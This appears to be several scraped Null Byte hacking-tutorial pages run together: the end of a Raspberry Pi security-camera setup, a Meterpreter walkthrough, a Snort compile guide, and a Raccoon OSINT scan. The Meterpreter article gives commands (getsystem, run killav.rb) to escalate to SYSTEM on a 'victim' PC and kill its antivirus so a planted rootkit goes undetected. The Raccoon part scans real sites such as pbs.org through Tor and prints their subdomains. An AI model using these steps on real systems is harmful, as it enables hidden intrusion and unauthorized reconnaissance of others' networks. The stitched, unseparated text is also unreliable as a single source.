WinZip costs money, but you can usually get away with using the free trial. Once you have one of those on your computer, click on the archive and extract the files.Step 2: Flash the Image to the MicroSD CardNow, we need to write the image to your microSD card. Best practice is to unplug any external hard drives or other USB devices you have, and then insert your microSD into its adapter and plug it in. This is important because you don't want to accidentally flash the wrong device.If you already have a program to flash the image to the card, then you can use that. Otherwise, downloadEtcher, as it's the easiest to use. It works on Windows, Mac, and Linux while also having the simplest user interface. Etcher should detect what operating system you are using, but if not, make sure you download the correct version based on your operating system (OS) and follow the on-screen installation directions. Open Etcher (if it doesn't automatically after installation), and select the image you just downloaded.Next, be sure the proper drive is selected and flash the image. Once it's done, it will safely eject the SD card. There is a rare chance that Etcher will cause an error. If that does happen, you can use ApplePiBaker for Mac or Win32 Disk Imager for Windows.Step 3: Configure Wi-FiWe can use ethernet to connect our Pi to the network. That will give us the fastest and most stable connection that can't be jammed by a simpleWi-Fi Deauth attack, but sometimes we want or need to use a Wi-Fi connection, so let's take a quick look at how to do that.If you are using windowsdownload Notepad++or else you will have problems with how it saves line breaks. Once you download it, open it and go to "Edit" then "EOL Conversion" and click on "UNIX"To have the Pi connected to the network on boot, we need to give it the network credentials. We can do this with a file called "wpa_supplicant.conf" which we add to the boot partition of the SD card. Etcher will have ejected the SD card, so physically remove it and reinsert it. In Windows, you will need to enable File name extensions under the view tab of File Explorer so that you can edit the file type.Then, using a text editor such as Notepad++, create a file named "wpa_supplicant.conf". Here, I first made a new text document, then renamed it.Copy in the following, replacing the SSID and PSK with your information, but don't remove the quotes. If you live outside the US, you canlook up your country codeand replace that too.country=usupdate_config=1ctrlinterface=/var/run/wpasupplicantnetwork={scan_ssid=1ssid="MyNetworkSSID"psk="YourPassword"}After that is done, save the file and safely eject the SD card. If you do a lot of Pi builds, this can be a useful file to keep on your desktop and copy over to every new Pi you set up to quickly connect it to the Wi-Fi network.Step 4: Putting Together the DeviceThe most important part of the assembly is to connect the camera. Let's look at how it should be done on the Pi and Pi Zero.First, lift up the black plastic part of the ribbon connector, found between the HDMI and audio ports on the Pi 3.Image by Hoid/Null ByteThen, insert the ribbon cable with the copper connectors facing the HDMI port and press the black piece back down.Image by Hoid/Null ByteOn the Pi Zero, it is very similar. Pull out the black plastic part of the ribbon connector.Image by Hoid/Null ByteNow, insert the ribbon with the copper leads facing the PCB and press the black piece back in.Image by Hoid/Null ByteAfter that, you should do the same with the other end of the cable and the camera module, with the copper leads facing the PCB.Image by Hoid/Null ByteInsert the SD card into the slot at the bottom of your Raspberry Pi. The last stage is to put it all in whatever housing you have chosen. Here, I have the Pi Foundation case that comes in the CanaKit.Image by Hoid/Null ByteRemember not to bend the cable too much, particularly at too sharp of an angle. It can take a bit of force to snap the camera in place, so don't worry too much about breaking it.Image by Hoid/Null ByteFinally, plug the Pi into power.Step 5: Start Your PiThe Pi can take a few minutes to boot up the first time so you can go grab some coffee or get started flashing another SD card if you are making more than one. After three to five minutes it should have booted, so we need to find it on our network.The IP address can be found a number of ways, including opening your router's admin page and looking at connected devices or using a program likeNmap,Fing, orAngry IP Scanner. If you can't locate it, then the most likely problem is the "wpa_supplicant.conf" file. Double check it and make sure the info there is correct.Once you find the Pi's IP address, plug it into your browser of choice. You will be taken to the login page for the camera. The default username isadminandno password.If everything has been done correctly, then in the top left corner we should see the live video feed now.It may be necessary to physically rotate the camera to get the image to be upright.For obvious reasons, the first thing we need to do is set an admin password and user password. Click the three horizontal bars on the top left of the screen, and then click "General Settings".Unfortunately, you can't change the admin username, but you can change the "Surveillance Username." As the name implies, this user can only view the cameras but has no power to change settings. Go ahead and set passwords for both of these accounts.While you are in the menu, you may also consider changing the "Camera Name" under "Video Device". This is very helpful when you have a lot of cameras or, you have someone unfamiliar with the camera setup watching. After that, click "Apply" on the top bar, and the camera will restart.When it's done restarting, we need to check for updates. Go to the "General Settings" tab and click on "Advanced Settings." The tab will then expand, and then click "Check" beside "Software Updates." You should get in a regular habit of doing this.You may want to change the timezone and Hostname. This is also where you should go to shutdown the Pi safely.Step 6: Fix IP AddressTo make it easy to add cameras and find the web page in the future, it is nice to set a static IP address. Find the Network tab in the settings and open it. Then, change IP configuration to static, setting the IP to the one it currently has.Step 7: Adding CamerasIn any type of real-world usage, more than a single camera will be needed. Our current setup can be visualized like this.Image viamotionEyeOSHowever, this won't work well, as we would have to visit a different web page for each new camera. We have two options for adding cameras. The first is to have the Pi host more than one camera, which could be done by adding web cameras to the Pi. This can be useful if one area needs several cameras to cover all angles, but is limited by the processing power of the Pi. Depending on how you set the resolution and frame rate settings, you might get away with this on the Pi 3, but not on the Pi Zero.Image viamotionEyeOSTo add to the network this way, go to the top left of the page and open the "Settings" tab then click on "Camera 1" and "add camera."Then a window will appear, by default, it will look for any more local cameras on the Pi. I didn't have any but if you do there will be a drop-down menu beside "Camera." Select the one you want to add and click "OK."The second way we can set this up is to have one motionEye remotely control another motionEye camera. We can even designate one of the motionEye devices as a hub and add all of the other motionEye-based cameras to this hub as remote motionEye cameras. This works best for our Pi based build, because of the limited CPU power of each individual Pi. Pi Zeros make great remote cameras with a Pi 3 acting as a hub.Image viamotionEyeOSGo to the "Add Camera" menu as before, but this time select "remote motionEye." You will then need to provide the information, with the URL being the static IP address we set. If that Pi has more than one camera, then you can pick which one to add.Step 8: Set Up Motion DetectionNow that we have the cameras up and running, we need to select our motion detection settings. These are some general starting points, but you will have to experiment with these until it works the way you want.If you have problems with false positives, then turn "Mask" on, and you will be able to select portions of the camera frame to have the software ignore. This is really useful if you have trees that move in the wind, or cars driving by on a street.Putting It All TogetherToday we have learned how to set up one or many Raspberry Pi cameras running motionEyeOS, and form them into a network.Don't Miss:How To Find Vulnerable Webcams Across The Globe Using ShodanThere are far more settings we can look at, such as port forwarding so we can see the camera from anywhere on the internet, triggering scripts based on motion events, and employing the GPIO pins. We will look at some of these features in a future article. Until then, explore the rest of the settings on your own, and don't forget about the tooltips that will pop up to the right of each setting as you mouse over it.If you have any questions, feel free to leave them in the comments or onTwitter!Follow Null Byte onTwitterandGoogle+Follow WonderHowTo onFacebook,Twitter,Pinterest, andGoogle+Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover Photo byKai HendryScreenshots by Hoid/Null ByteRelatedHow To:Enable Monitor Mode & Packet Injection on the Raspberry PiHow To:Set Up a Headless Raspberry Pi Hacking Platform Running Kali LinuxHow To:Build a Beginner Hacking Kit with the Raspberry Pi 3 Model B+How To:Log into Your Raspberry Pi Using a USB-to-TTL Serial CableHow To:Build a Pumpkin Pi β€” The Rogue AP & MITM Framework That Fits in Your PocketHow To:Discover & Attack Raspberry Pis Using Default Credentials with Rpi-hunterHow To:Set Up Kali Linux on the New $10 Raspberry Pi Zero WThe Hacks of Mr. Robot:How to Build a Hacking Raspberry PiHow To:Load Kali Linux on the Raspberry Pi 4 for the Ultimate Miniature Hacking StationHow To:Build a Portable Pen-Testing Pi BoxHow To:Hack WiFi Using a WPS Pixie Dust AttackHow To:Turn Any Phone into a Hacking Super Weapon with the SonicHow To:Wardrive with the Kali Raspberry Pi to Map Wi-Fi DevicesHow To:Build an Off-Grid Wi-Fi Voice Communication System with Android & Raspberry PiRaspberry Pi:Hacking PlatformHow To:Boot Multiple Operating Systems on the Raspberry Pi with BerryBootOpen Sesame:Make Siri Open Your Garage Door via Raspberry PiRaspberry Pi Alternatives:10 Single-Board Computers Worthy of Hacking Projects Big & SmallHow To:Hack WPA WiFi Passwords by Cracking the WPS PINHow To:Use VNC to Remotely Access Your Raspberry Pi from Other DevicesHow To:Share Wi-Fi Adapters Across a Network with Airserv-NgHow To:Automate Hacking on the Raspberry Pi with the USB Rubber DuckyHow To:Lock Down Your DNS with a Pi-Hole to Avoid Trackers, Phishing Sites & MoreHow To:Use a Flatbed Scanner and Raspberry Pi to Take Super Sharp Macro PhotosNews:Smart Home Proof of Concept Uses a Raspberry Pi to Control Air Conditioner with HoloLensHow To:Log Wi-Fi Probe Requests from Smartphones & Laptops with ProbemonHow To:Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2019
Hack Like a Pro: How to Kill and Disable Antivirus Software on a Remote PC Β« Null Byte :: WonderHowTo
Welcome back, my tenderfoot hackers!In some of my past articles, I've shown numerous ways of embedding a listener/rootkit on a remote system, includingbuffer overflowsof the operating system, getting the victim to click on a link to ourmalicious website, and sending a maliciousMicrosoft OfficeandAdobe Acrobatfile.In each case, we've embedded a listener/rootkit that gives us control over the system. Metasploit has a powerful listener called Meterpreter that enables us to control the system, send more commands, pivot from the victim to other systems, elevate our privileges, and many other things, as we will see.My next few posts will focus on how to use the Meterpreter in various powerful ways. Today, we will focus on how to use the Meterpreter to disable the antivirus protection on our victim system, which is more advanced than simplybypassing the antivirus program, as I wrote about last time.Disabling is necessary because the next time the system is scanned by the victim's antivirus software, it's likely to detect our listener and disable it, so we need to take preemptive action to disable it before it can disable us.So...fire upMetasploitand let's get hacking!Step 1: Getting StartedI'm assuming you have already embedded your Meterpreter listener by one of the many methods I've outlined in my earlier posts, and that you have a Meterpreter prompt as it appears in the screenshot below.Before we can begin to kill the AV software, we need to escalate our privileges.Usually, when we embed a listener on the victim's system, the listener will only have the privileges of the user who provided us with a gateway to their system by clicking on themalicious website,Office doc,Abobe PDF, etc.That user most often has limited rights or privileges to the system. Unlimited rights to do anything on the system is held by the administrator or system administrator (or sysadmin for short).We need to escalate our privileges from the user to sysadmin to have our way with this computer.Step 2: Checking the UserBefore we start the process of escalation, let's check what user we are logged in as. Type:meterpreter > getuidThis will return the ID of the user we are logged in as. If we are anything but the sysadmin, we'll need to escalate to kill the antivirus software.Step 3: Escalate PrivilegesMetasploit and its Meterpreter make it simple to escalate privileges to the sysadmin. Simply typegetsystemat the Meterpreter prompt.meterpreter > getsystemNotice that Metasploit responds with "...got system (with technique 1)". Metasploit has multiple methods to escalate privileges and it tries each of them out until one works.In our case, it was successful with technique 1.Step 4: Check That We Are SysadminNow that Metasploit has told us that it has escalated our privileges to sysadmin, let's make sure. Type:meterpreter > getuidAs you can see in my screenshot above, the victim responds withNT AUTHORITY\SYSTEM, the syadmin user!Congratulations! You can now have your way this victim.Step 5: Kill the AntiVirus SoftwareNow that we have unlimited rights to this system, let's kill the antivirus software. Metasploit has a Ruby script calledkillav.rb. We simply run that script from the Meterpreter prompt and it will kill the system's antivirus software.Make certain to start the script with the keywordrun. Type:meterpreter > run killav.rbNotice from the screenshot above that the killav.rb script not only killed the antivirus process, but also the open command prompt.Now that we have killed the antivirus process, we can remain hidden within their system and do as we please with little or no chance of being detected.In upcoming blogs, we will explore more adventures with the power of our embedded listener/rootkit with sysadmin privileges. There is no limit what we can do now!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseRelatedHow To:Disable Anti Virus Services After Got Meterpreter Session on Remote PC.Best Android Antivirus:Avast vs. AVG vs. Kaspersky vs. McAfeeHow To:Remove the Palladium Pro rogue malware from your computerHacking macOS:How to Create an Undetectable PayloadHack Like a Pro:How to Bypass Antivirus Software by Disguising an Exploit's SignatureHow To:Remove Personal Antivirus from your Windows PCHow To:Android's Built-In Scanner Only Catches 15% of Malicious Appsβ€”Protect Yourself with One of These Better AlternativesHow To:Remove AntiVirus LiveHow To:Protect your PC by disabling Remote DesktopHow To:Remove Advanced Virus Remover spyware from your computerNews:Apple Releases iOS 13.3.1 for iPhone, Fixes Security Bug in Mail AppHow To:Use the USB Rubber Ducky to Disable Antivirus Software & Install RansomwareHow To:Remove Antivirus Pro from your computer with SpyhunterHow To:Null Byte & Null Space Labs Present: Wi-Fi Hacking, MITM Attacks & the USB Rubber DuckyHow To:Remove AntiVirus Pro from your computerHow To:3 Reasons You Still Need a Good Antivirus App on AndroidHack Like a Pro:How to Remotely Record & Listen to the Microphone on Anyone's ComputerNews:Epson to Launch Moverio Assist as Easier to Deploy Smartglasses Remote Assistance ToolHow To:Remove the MS Removal Tool malware from your PCHow To:The Safest Way to Disable ALL Bloatware on Your Galaxy S10How To:Turn Your Android Phone into a Universal Remote Control with These Cool AppsHack Like a Pro:How to Remotely Install a Keylogger onto Your Girlfriend's ComputerHow To:Identify Antivirus Software Installed on a Target's Windows 10 PCHacking Windows 10:How to Break into Somebody's Computer Without a Password (Exploiting the System)Hack Like a Pro:How to Change the Signature of Metasploit Payloads to Evade Antivirus DetectionHow To:Simulate a RAT on Your Network with ShinoBOTLockdown:The InfoSecurity Guide to Securing Your Computer, Part INews:VARIOUS WINDOWS ISSUES RESOLVED BELOW...News:WINDOWS 7 (FIX TWEAK, REPAIR, CONJOIN SHELLS ETC...)News:Jailbreak your PS3!News:... A Few Cool FreewarezZz ...News:In Just a Clik, Turn Your Smartphone into a YouTube Remote for Any Web DisplayHow To:Remove System Tool Malware (System Tool Antivirus) On Windows PCsLockdown:The InfoSecurity Guide to Securing Your Computer, Part IIDrive-By Hacking:How to Root a Windows Box by Walking Past ItHow To:Get the "Kill Box" Achievement in Call of Duty: Modern Warfare 3How To:How Hackers Use Your IP Address to Hack Your Computer & How to Stop It
Hack Like a Pro: How to Compile a New Hacking Tool in Kali Β« Null Byte :: WonderHowTo
Welcome back, my newbie hackers!Recently, I "upgraded" toKalias my hacking platform, despite my preference forBackTrack. I did this reluctantly, primarily because new readers here could no longer download BackTrack from their site. I want to point out here that we all must keep in mind that with any softwareβ€”or for that matter, any productβ€”that is newer is not necessarily better.Although Kali has some new tools and has new version of old tools, the developers of Kali left out some very valuable ones. A tool that I am missing most isSnort.Snort is the world's most widely used Intrusion Detection System (IDS), and as such, I use it to test whether my exploits can get past it without detection. In the previous versions of BackTrack, Snort has always been included, but not Kali. I thought I would take this opportunity to show you how to download, install, and compile a new tool to Kali, using Snort as an example.The Process of Compiling Tools for KaliThe process will differ slightly for each tool, but the overall process is very similar. In the case of Snort, we have some dependencies that must be installed to make it work properly. Other tools may or may not have dependencies. One of the advantages of using a package manager such asrpmor.debis that it will usually handle the dependencies for you. The drawback is that you get a tool that is not necessarily optimized for your platform.By compiling the tool, we can optimize it for our platform. This means that it will run faster and more efficiently. In a production environment for Snort, this is critical. A slow or inefficient Snort will either drop packets or slowdown your network. Neither is good, so let's look at installing Snort from its source code and compiling it specifically for our platform.Step 1: Download SnortYou can download Snort atsnort.org.When you click on "Download Snort" button, it will take you to this page.Select the "Source" snort.2.9.6.1.tar.gz. If you are using a browser, it will prompt you with the following screen. Chose to save Snort. In this case, I saved it to my Desktop, but you can save it wherever is convenient and easiest for you.As you can see, the source file is now on my Desktop in Kali.Step 2: Pre-InstallationBefore we install Snort, there are few pieces of software that Snort needs to run properly. These are often referred to as dependencies. They can include library files and other files that an application needs to run. In the case of Snort, there are a few.Let's do that now.kali> sudo apt-get install flex bison build-essential checkinstall libpcap-dev libnet1-dev libpcre3-dev libmysqlclient15-dev libnetfilter-queue-dev iptables-devYou will be prompted twice with (y/n). Simply selectyto both.Step 3: Build & Install LibnetNext, we need to download, build, and installlibnetfrom the source. We can download it fromhere. In this case, I'm using the command-line download toolwget.kali >wgethttps://libdnet.googlecode.com/files/libdnet-1.12.tgzOnce we have successfully downloaded libdnet, we need to untar it, configure it and make it.First , untar it:kali >tar xvfvz libdnet-1.12.tgzThen, change directories to the new libnet directory:kali > cd libdnet-1.12And configure it with the "CFLAGS=-fPIC" for a 64-bit version:kali > ./configure "CFLAGS=-fPIC"And finally,makethe file:kali > makeWe should then be greeted by a screen like that below.Step 4: Build Symbolic Link to Where Snort Looks for LibnetWe need to build a symbolic link from where libnet is, to the location where Snort expects libnet to be, by typing:kali> ln -s /usr/local/lib/libdnet.1.0.1 /usr/lib/libdnet.1Step 5: Build & Install Data Acquisistion (DAQ) LibrarySnort has what is called a Data Acquisistion Library (DAQ). This is an abstraction layer for I/O (input/output) that enables us to plug different hardware/software interfaces for packet I/O. We can download it at snort.org as well.I've downloaded it and placed it on my Desktop as well.We go to the terminal and cd to the Desktop directory and then untar this file.kali> tar xvfvz daq-2.0.2.tar.gzThen we change directories to the new daq directory:kali> cd daq-2.0.2And configure it:kali > ./configureThen finally,makethe file:kali > makeStep 6: Install SnortNow that we have all the files we need to run Snort, let's complete the installation of Snort. Change to the Desktop directory. You should see the Snort source code there.Next, let's change directories to/binand make a directory in the /bin directory named snort. Let's now copy the snort source code to that directory:kali > cp /root/Desktop/ snort-2.9.6.1.tar.gz /bin/snortNext, let's untar it:kali > tar xzvf snort-2.9.6.1.tar.gzStep 7: CompileIn our final step, we need to compile Snort. Let's change to the new directory that was created when we untarred the source code file.kali> cd /bin/snort/snort-2.9.6.1Now, let's configure it.kali > ./configureAnd finally, make Snort.kali >makeNow we should have a compiled version of Snort specifically compiled for our platform! We can now run Snort by simply typing snort at the command prompt:kali >snortAlthough the steps with differ slightly for different tools, the basic steps to compile a new tool are:Download the toolUntar and uncompress the toolConfigure the toolMake the toolHope this all helps with having compiled Snort, but most importantly, I hope it helps with understanding how to compile ANY tool inLinux, and specifically, Kali. If all this seems too much, you can always simply use the package manager, aptitude (apt-get install snort). This will install the binaries for your platform, but not necessarily optimize it for your platform.Keep coming back, my newbie hackers, as we continue along this exhilarating learning path to becoming pro hackers!Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image viaShutterstockRelatedHow To:Hack WPA WiFi Passwords by Cracking the WPS PINHow To:Use MinGW to Compile Windows Exploits on Kali LinuxHack Like a Pro:Digital Forensics Using Kali, Part 1 (The Tools of a Forensic Investigator)The Hacks of Mr. Robot:How to Build a Hacking Raspberry PiHow To:Links to Help You HackingHack Like a Pro:How to Build Your Own Exploits, Part 2 (Writing a Simple Buffer Overflow in C)Hack Like a Pro:How to Create a Smartphone Pentesting LabHow To:Run Kali Linux as a Windows SubsystemMac for Hackers:How to Install the Metasploit FrameworkHow To:Get Started with Kali Linux (2014 Version)How To:Install iLok plug-ins for Pro Tools 8 in Mac OS XHow to Hack Wi-Fi:Breaking a WPS PIN to Get the Password with BullyHow To:Mix and master in Pro Tools 8How To:Hack WiFi Using a WPS Pixie Dust AttackHow To:Load Kali Linux on the Raspberry Pi 4 for the Ultimate Miniature Hacking StationHow To:Build a Portable Pen-Testing Pi BoxHack Like a Pro:How to Hack Web Apps, Part 2 (Website Spidering with WebScarab)Hack Like a Pro:How to Clone Any Website Using HTTrackHack Like a Pro:How to Install BackTrack 5 (With Metasploit) as a Dual Boot Hacking SystemNews:Day 2 Of Our New WorldNews:What does Pro Tools HD Native mean for you?News:First Steps of Compiling a Program in Linux
How to Conduct OSINT Recon on a Target Domain with Raccoon Scanner Β« Null Byte :: WonderHowTo
Reconnaissanceis the phase of an attack where a red team or hacker designs a strategy based on the information they can learn about the target, as well as what the available attack surface looks like. These scans can take time to discover relationships, butRaccoonOSINT scanner coordinates multiple automated scans to produce invasively detailed reports on a target with a single command.Data about a website like the software powering it, URL registration information, and network information such as associated IP addresses are critical for a hacker to identify which attack might be the most effective. Rather than running separate scans to gather this information, Raccoon scanner forages for available information on targeted domains with a single command.Useful Book on Amazon:Mike Bazzell's "Open Source Intelligence Techniques: Resources for Searching and Analyzing Online Information"Domain OSINT Really FastWhile using scanners likeNmapare typical for recon, the ability to discern relationships are often better left for tools likeMaltego. In general, Maltego is an excellent tool for discovering relationships and digging deep, but with theClassicedition coming at a substantial price tag, not everyone has access to everything Maltego offers. The community edition comes with restrictions on how many results are returned, making it not always the ideal choice for recon.Don't Miss:Research a Person or Organization Using the Operative FrameworkOn the flip side, Nmap can be better for learning about what ports are open or what types of services are running, allowing you to quickly discern what kind of setup might be running on the other end of a connection. Besides Nmap, there are a large number of different scanners that can be used to gatherOSINTinformation on a target autonomously. In fact,Sn1peris another tool for recon automation that also takes the step of doing vulnerability testing.What You'll NeedTo get started, you'll need to haveKali Linuxinstalled and fully updated (apt update). Also, I found that the installation instructions included in GitHub for Raccoon Scanner didn't work on my Kali system; Because they usedPython pip, I used pip3 to install Racoon scanner instead, which worked fine. If you don't have pip3 installed, you can do so with the followingapt installcommand.apt update apt install python3-pipStep 1: Install Raccoon ScannerTo install Raccoon scanner, you can simply type the following command.pip3 install raccoon_scannerIf this doesn't work, you can also try installing it manually fromthe tool's GitHub pageusing theusual git clone method.Step 2: View Options & FiltersTo get started, you can typeraccoon --helpto see a list of all of the available filters. Since Priceline left me stranded in the hot Nevada desert yesterday, I wanted to use Priceline.com as a test, but after one scan, we found their website blocked our IP address for a week. Be aware Raccoon scanner can trigger this kind of defensive behavior! Because of priceline.com's reaction, we'll be using pbs.org instead.We can indicate the target we want to use by typing a-tbefore the website we want to search for.Usage: raccoon [OPTIONS] Options: --version Show the version and exit. -t, --target TEXT Target to scan [required] -d, --dns-records TEXT Comma separated DNS records to query. Defaults to: A,MX,NS,CNAME,SOA,TXT --tor-routing Route HTTP traffic through Tor (uses port 9050). Slows total runtime significantly --proxy-list TEXT Path to proxy list file that would be used for routing HTTP traffic. A proxy from the list will be chosen at random for each request. Slows total runtime -c, --cookies TEXT Comma separated cookies to add to the requests. Should be in the form of key:value Example: PHPSESSID:12345,isMobile:false --proxy TEXT Proxy address to route HTTP traffic through. Slows total runtime -w, --wordlist TEXT Path to wordlist that would be used for URL fuzzing -T, --threads INTEGER Number of threads to use for URL Fuzzing/Subdomain enumeration. Default: 25 --ignored-response-codes TEXT Comma separated list of HTTP status code to ignore for fuzzing. Defaults to: 302,400,401,402,403,404,503,504 --subdomain-list TEXT Path to subdomain list file that would be used for enumeration -sc, --scripts Run Nmap scan with -sC flag -sv, --services Run Nmap scan with -sV flag -f, --full-scan Run Nmap scan with both -sV and -sC -p, --port TEXT Use this port range for Nmap scan instead of the default -fr, --follow-redirects Follow redirects when fuzzing. Default: False (will not follow redirects) --tls-port INTEGER Use this port for TLS queries. Default: 443 --skip-health-check Do not test for target host availability --no-url-fuzzing Do not fuzz URLs --no-sub-enum Do not bruteforce subdomains --skip-nmap-scan Do not perform an Nmap scan -q, --quiet Do not output to stdout -o, --outdir TEXT Directory destination for scan output --help Show this message and exit.If you want to have an increased buffer between you and your target, you can start aTorservice so that all of the scans against your target occur through a Tor relay. To do so, typetorin another terminal window to start a new Tor session, and then type--tor-routingafter your target to indicate that Raccoon should connect through Tor.root@nullbyte:~# raccoon -t priceline.com --tor-routing _____ _____ _____ ____ ____ _ _ | __ \ /\ / ____| / ____| / __ \ / __ \ | \ | | | |__) | / \ | | | | | | | | | | | | | \| | | _ / / /\ \ | | | | | | | | | | | | | . ' | | | \ \ / ____ \ | |____ | |____ | |__| | | |__| | | |\ | |_| \_\ /_/ \_\ \_____| \_____| \____/ \____/ |_| \_| 4841434b544845504c414e4554 https://github.com/evyatarmeged/Raccoon ---------------------------------------------------------------------------- [!] Testing that Tor service is up... [!] Validated Tor service is up. Routing traffic anonymously. ### Raccoon Scan Started ### [#] Trying to gather information about host: priceline.com [!] Found priceline.com to be a naked domain [v] Writing DNS query results [#] Setting Nmap scan to run in the background [#] Nmap script to run: nmap -Pn priceline.com [v] Nmap scan startedIt's worth pointing out that Tor exit notes are notoriously "dirty," meaning malicious traffic is regularly detected coming from them. Many websites will outright block traffic from Tor because they know it has a high likelihood of being malicious, leading to the scanner being unable to retrieve any results.Don't Miss:Scrape Target Email Addresses with TheHarvesterStep 3: Select & Scan a Target DomainWe'll do a scan on pbs.org using a Tor proxy. One thing to note is that, due to abuse, many domains blacklist Tor-based IP addresses, which means using a Tor relay may produce fewer results than using a non-"dirty" IP address. Because Tor can be used by anyone, many website operators treat Tor traffic as inherently suspicious.To begin our scan, we can type the following.raccoon -t pbs.org --tor-relayThis scan will run for a long time, depending on the size of the target surface area. If you are using the--tor-relayflag, this will also increase time. If you find it running too slow and don't care that the target is being scanned by your IP address, you can also do this step without the Tor relay and use a VPN or proxy.Step 4: Navigate to the Results & Read ReportsOnce the scan is complete, a folder will be created to hold the results of the scan. To find these, type the following into a terminal window to change (cd) into the root, then the scan results, then list (ls) them.cd cd Raccoon_scan_results lsNow, you should see a list of every website you've run a report against. To proceed, we'll typecd pbs.orgbecause that is the last scan we ran. Finally, we can typelsto see all of the text files available in the report. To open these, we'll use nano.root@nullbyte:~# ls airgeddon Documents modwifi Pictures Raccoon Templates Desktop Downloads Music Public Racoon_scan_results 'respero.pca' root@nullbyte:~# cd Raccoon_scan_results root@nullbyte:~# ls pbs.org root@nullbyte:~/Raccoon_scan_results# cd pbs.org root@nullbyte:~/Raccoon_scan_results/pbs.org# ls dns_mapping.png nmap_scan.txt subdomain_fuzz.txt tls_report.txt WAF.txt dns_records.txt robots.txt subdomains.txt url_fuzz.txt web_scan.txt root@nullbyte:~/Raccoon_scan_results/pbs.org#Step 5: Interpret the Scan ReportsTo start interpreting the results, we can begin by opening the results of the Nmap scan withnano nmap_scan.txt. With it, we can see the IP address of pbs.org, as well as all of the ports discovered. We can close this window by typingCtrl-X.Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-23 02:10 PDT Nmap scan report for pbs.org (54.225.206.152) Host is up (0.096s latency). Other addresses for pbs.org (not scanned): 54.225.198.196 rDNS record for 54.225.206.152: ec2-54-225-206-152.compute-1.amazonaws.com Not shown: 998 filtered ports PORT STATE SERVICE 80/tcp open http 443/tcp open https Nmap done: 1 IP address (1 host up) scanned in 9.04 secondsHere, we see that the IP address for pbs.org is 54.225.206.152 and has the expected ports 80 and 443 open to serve web traffic. We can also see a "compute-1.amazonaws.com" address under the rDNS record, giving us initial clues about the service provider used.Don't Miss:Use SpiderFoot for OSINT GatheringNext, we can see a list of subdomains we've discovered beneath the main domain by typingnano subdomains.txt." This list can be used to further identification of vulnerabilities by feeding the results of a vulnerability scanner likeNikto.[1;34m[#][0;0m Enumerating Subdomains [93m[!][0;0m Trying to find Subdomains in SANs list [1;32m[v][0;0m Subdomain detected: ops.pbs.org [1;32m[v][0;0m Subdomain detected: sentry.pbs.org [1;32m[v][0;0m Subdomain detected: www-cache.pbs.org [1;32m[v][0;0m Subdomain detected: jaws.pbs.org [1;32m[v][0;0m Subdomain detected: video.pbs.org [1;32m[v][0;0m Subdomain detected: image.pbs.org [1;32m[v][0;0m Subdomain detected: player.pbs.org [1;32m[v][0;0m Subdomain detected: login.pbs.org [1;32m[v][0;0m Subdomain detected: admin.pbs.org [1;32m[v][0;0m Subdomain detected: teacherline.pbs.org [1;32m[v][0;0m Subdomain detected: git.pbs.org [1;32m[v][0;0m Subdomain detected: dipsy-tc.pbs.org [1;32m[v][0;0m Subdomain detected: koth-qa.svp.pbs.org [1;32m[v][0;0m Subdomain detected: heart.ops.pbs.org [1;32m[v][0;0m Subdomain detected: account.pbs.org [1;32m[v][0;0m Subdomain detected: weta-qa.svp.pbs.org [1;32m[v][0;0m Subdomain detected: wnet.video-qa.pbs.org [1;32m[v][0;0m Subdomain detected: www.pbs.org [1;32m[v][0;0m Subdomain detected: wnet.video-staging.pbs.org [1;32m[v][0;0m Subdomain detected: docs.pbs.org [1;32m[v][0;0m Subdomain detected: projects.pbs.org [1;32m[v][0;0m Subdomain detected: whut-qa.svp.pbs.org [1;32m[v][0;0m Subdomain detected: ga.video.cdn.pbs.org [1;32m[v][0;0m Subdomain detected: kids.pbs.org [1;32m[v][0;0m Subdomain detected: urs.pbs.org [93m[!][0;0m Trying to discover subdomains in Google [1;32m[v][0;0m Detected subdomain through Google dorking: shop.pbs.org [1;32m[v][0;0m Detected subdomain through Google dorking: Labto.pbs.org [1;32m[v][0;0m Detected subdomain through Google dorking: to.pbs.org [1;32m[v][0;0m Detected subdomain through Google dorking: LearningMediato.pbs.org [1;32m[v][0;0m Detected subdomain through Google dorking: Timeto.pbs.org [1;32m[v][0;0m Detected subdomain through Google dorking: Playto.pbs.org [1;32m[v][0;0m Detected subdomain through Google dorking: YouTubeto.pbs.org [1;32m[v][0;0m Detected subdomain through Google dorking: Podcaststo.pbs.org [1;32m[v][0;0m Detected subdomain through Google dorking: Mediumto.pbs.org [1;32m[v][0;0m Detected subdomain through Google dorking: KIDSto.pbs.org [1;32m[v][0;0m Detected subdomain through Google dorking: Mediato.pbs.org [1;32m[v][0;0m Detected subdomain through Google dorking: PBSKidsto.pbs.org [93m[!][0;0m Trying to extract subdomains from DNS dumpster [1;31m[x][0;0m Failed to query DNS dumpster for subdomains [93m[!][0;0m Bruteforcing subdomains [1;34m[#][0;0m Done enumerating Subdomains [1;34m[#][0;0m Enumerating Subdomains [93m[!][0;0m Trying to find Subdomains in SANs list [1;32m[v][0;0m Subdomain detected: git.pbs.org [1;32m[v][0;0m Subdomain detected: login.pbs.org [1;32m[v][0;0m Subdomain detected: projects.pbs.org [1;32m[v][0;0m Subdomain detected: ga.video.cdn.pbs.org [1;32m[v][0;0m Subdomain detected: dipsy-tc.pbs.org [1;32m[v][0;0m Subdomain detected: whut-qa.svp.pbs.org [1;32m[v][0;0m Subdomain 